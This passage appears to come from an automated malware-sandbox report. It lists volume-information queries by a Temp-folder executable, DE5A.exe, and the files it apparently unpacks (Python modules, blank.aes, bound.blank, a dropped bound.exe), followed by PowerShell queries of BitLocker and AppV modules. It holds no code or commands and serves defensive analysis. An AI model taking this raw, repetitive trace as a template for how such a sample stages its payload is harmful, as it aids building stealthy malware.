                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\blank.aes VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_lzma.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_bz2.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_sqlite3.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_socket.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\select.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_ssl.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_hashlib.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\_queue.pyd VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\bound.blank VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\bound.blank VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bound.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\base_library.zip VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DE5A.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882 VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI35882\unicodedata.pyd VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
